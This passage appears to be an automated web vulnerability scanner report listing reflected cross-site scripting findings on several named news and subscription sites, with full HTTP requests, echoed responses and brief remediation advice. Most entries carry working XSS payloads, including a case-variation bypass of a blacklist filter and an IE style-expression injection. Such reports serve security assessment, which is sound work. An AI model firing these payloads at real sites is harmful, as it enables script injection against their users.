GET /security/article/227300150/index.html76cb5'><a>6bc9e7501bf HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f567"><a>5c2079e2fb6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/227300150/index.html7f567"><a>5c2079e2fb6 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F227300150%2Findex.html7f567%22%3E%3Ca%3E5c2079e2fb6&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/227300150/index.html7f567"><a>5c2079e2fb6"> ...[SNIP]...
3.597. http://www.darkreading.com/security/article/227300150/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/227300150/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4aaa7"><script>alert(1)</script>7168d09b654 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/227300150/index.html?4aaa7"><script>alert(1)</script>7168d09b654=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb8db"><a>fa8effb5f94 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articlecb8db"><a>fa8effb5f94/227500152/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5c3"><a>2d929fa800c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2275001527b5c3"><a>2d929fa800c/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cd24"><a>9bde4711cd0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/227500152/index.html8cd24"><a>9bde4711cd0 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f6da'><a>fd951a3e86d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/227500152/index.html7f6da'><a>fd951a3e86d HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... <a href='http://www.darkreading.com/security/article/227500152/index.html7f6da'><a>fd951a3e86d?fmid=12509'> ...[SNIP]...
3.602. http://www.darkreading.com/security/article/227500152/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/227500152/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fbb8"><script>alert(1)</script>2f91976e1b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/227500152/index.html?8fbb8"><script>alert(1)</script>2f91976e1b2=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... icle%2F227500152%2Findex.html%3F8fbb8%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2f91976e1b2%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/227500152/index.html?8fbb8"><script>alert(1)</script>2f91976e1b2=1"> ...[SNIP]...
3.603. http://www.darkreading.com/security/attacks-breaches [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/attacks-breaches
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10eb7"><script>alert(1)</script>04903b144bd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/attacks-breaches?10eb7"><script>alert(1)</script>04903b144bd=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Attacks/B ...[SNIP]... reading.com%2Fsecurity%2Fattacks-breaches%3F10eb7%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E04903b144bd%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/attacks-breaches?10eb7"><script>alert(1)</script>04903b144bd=1"> ...[SNIP]...
3.604. http://www.darkreading.com/security/client-security [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/client-security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f721"><script>alert(1)</script>855f3804288 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/client-security?2f721"><script>alert(1)</script>855f3804288=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>End User/ ...[SNIP]... rkreading.com%2Fsecurity%2Fclient-security%3F2f721%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E855f3804288%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/client-security?2f721"><script>alert(1)</script>855f3804288=1"> ...[SNIP]...
3.605. http://www.darkreading.com/security/encryption [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/encryption
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb6a3"><script>alert(1)</script>12c267aeb98 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/encryption?fb6a3"><script>alert(1)</script>12c267aeb98=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Encryptio ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Fencryption%3Ffb6a3%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E12c267aeb98%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/encryption?fb6a3"><script>alert(1)</script>12c267aeb98=1"> ...[SNIP]...
3.606. http://www.darkreading.com/security/nac [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/nac
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597f5"><script>alert(1)</script>f4a5a6d656f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/nac?597f5"><script>alert(1)</script>f4a5a6d656f=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>NAC | Dar ...[SNIP]... vice=http%3A%2F%2Fwww.darkreading.com%2Fsecurity%2Fnac%3F597f5%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef4a5a6d656f%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/nac?597f5"><script>alert(1)</script>f4a5a6d656f=1"> ...[SNIP]...
3.607. http://www.darkreading.com/security/perimeter-security [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/perimeter-security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6091e"><script>alert(1)</script>683a45e84b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/perimeter-security?6091e"><script>alert(1)</script>683a45e84b4=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Perimeter ...[SNIP]... ing.com%2Fsecurity%2Fperimeter-security%3F6091e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E683a45e84b4%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/perimeter-security?6091e"><script>alert(1)</script>683a45e84b4=1"> ...[SNIP]...
3.608. http://www.darkreading.com/security/privacy [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/privacy
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 956be"><script>alert(1)</script>8476c924650 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/privacy?956be"><script>alert(1)</script>8476c924650=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Privacy | ...[SNIP]... p%3A%2F%2Fwww.darkreading.com%2Fsecurity%2Fprivacy%3F956be%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E8476c924650%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/privacy?956be"><script>alert(1)</script>8476c924650=1"> ...[SNIP]...
3.609. http://www.darkreading.com/security/security-management [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/security-management
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dd2c"><script>alert(1)</script>11e3c82816a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/security-management?5dd2c"><script>alert(1)</script>11e3c82816a=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Security ...[SNIP]... g.com%2Fsecurity%2Fsecurity-management%3F5dd2c%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E11e3c82816a%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/security-management?5dd2c"><script>alert(1)</script>11e3c82816a=1"> ...[SNIP]...
3.610. http://www.darkreading.com/security/storage-security [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/storage-security
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1204e"><script>alert(1)</script>65e9c3df79c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/storage-security?1204e"><script>alert(1)</script>65e9c3df79c=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Storage S ...[SNIP]... reading.com%2Fsecurity%2Fstorage-security%3F1204e%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E65e9c3df79c%3D1&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/storage-security?1204e"><script>alert(1)</script>65e9c3df79c=1"> ...[SNIP]...
3.611. http://www.darkreading.com/security/vulnerabilities [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/vulnerabilities
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc46"><script>alert(1)</script>c30f82e43ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/vulnerabilities?1bc46"><script>alert(1)</script>c30f82e43ce=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the K request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae345"%3balert(1)//9b10183d617 was submitted in the K parameter. This input was echoed as ae345";alert(1)//9b10183d617 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ars/ddjintlforward.do?mode=pageforward&forward=ddjintlpage1&F=1021&K=WYH1ae345"%3balert(1)//9b10183d617 HTTP/1.1 Host: www.ddjsubscriptions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:08:16 GMT Set-Cookie: JSESSIONID=D695E11B7C4B9ED1C2314EBF0D2BEF45.tomcat1; Path=/ars Content-Type: text/html;charset=UTF-8 Connection: close Set-Cookie: UBM-ARS=238132160.20480.0000; expires=Sun, 12-Dec-2010 02:13:49 GMT; path=/ Content-Length: 52776
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4468e"style%3d"x%3aexpression(alert(1))"af8f2667205 was submitted in the REST URL parameter 1. This input was echoed as 4468e"style="x:expression(alert(1))"af8f2667205 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression within a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.
Request
GET /GLOBAL4468e"style%3d"x%3aexpression(alert(1))"af8f2667205/btg/iwbtn/user/register.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:01 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:01 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30307
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL4468e"style="x:expression(alert(1))"af8f2667205/btg/;kvarticleid=;kvauthor=;loc=300;grp=226145798" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 818c2"><ScRiPt>alert(1)</ScRiPt>a9753c26fcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Remediation detail
Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.
Request
GET /GLOBAL/818c2"><ScRiPt>alert(1)</ScRiPt>a9753c26fcd/iwbtn/user/register.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:07 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:07 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30250
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/818c2"><ScRiPt>alert(1)</ScRiPt>a9753c26fcd/iwbtn/u;kvarticleid=;kvauthor=;loc=300;grp=376397906" target="_blank"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7dd37</script>1c79a8dcf28 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GLOBAL/7dd37</script>1c79a8dcf28/iwbtn/user/register.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:10 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:10 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30126
<!-- IsEmpty true --> <!-- Check to see if this is an old story link (story/IWK20020101S001 for example) --> <SCRIPT LANGUAGE="javascript">var found="false"; // global variable to determine if a mat ...[SNIP]... <scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/GLOBAL/7dd37</script>1c79a8dcf28/iwbtn/user/register;kvarticleid=;kvauthor=;loc=100;target=_blank;grp=682658030;misc='+new Date().getTime()+'"> ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93c94</script><a>75eb4bf9d34 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /GLOBAL/btg/iwbtn/user/register.jhtml93c94</script><a>75eb4bf9d34 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 00:21:23 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:23 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 30218
